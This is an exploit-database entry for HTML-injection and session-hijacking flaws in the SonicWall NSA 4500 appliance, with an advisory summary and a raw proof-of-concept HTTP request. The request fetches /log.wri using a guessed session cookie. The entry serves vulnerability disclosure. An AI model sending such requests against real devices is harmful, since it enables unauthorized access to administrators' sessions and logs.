header-logo
Suggest Exploit
vendor:
NSA 4500
by:
Unknown
N/A
CVSS
N/A
HTML-injection and session-hijacking
Unknown
CWE
Product Name: NSA 4500
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE:
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Unknown
Unknown

SonicWall NSA 4500 HTML-injection and Session-hijacking Vulnerabilities

Exploiting these issues can allow an attacker to hijack a user's session and gain unauthorized access to the affected application, or run malicious HTML or JavaScript code, potentially allowing the attacker to steal cookie-based authentication credentials, and control how the site is rendered to the user; other attacks are also possible.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/49930/info

SonicWall NSA 4500 is prone to an HTML-injection vulnerability and a session-hijacking vulnerability.

Exploiting these issues can allow an attacker to hijack a user's session and gain unauthorized access to the affected application, or run malicious HTML or JavaScript code, potentially allowing the attacker to steal cookie-based authentication credentials, and control how the site is rendered to the user; other attacks are also possible.

GET /log.wri HTTP/1.0
Host: 123.123.123.123
Connection: close
User-Agent: brute-forcing
Cookie: SessId=111111111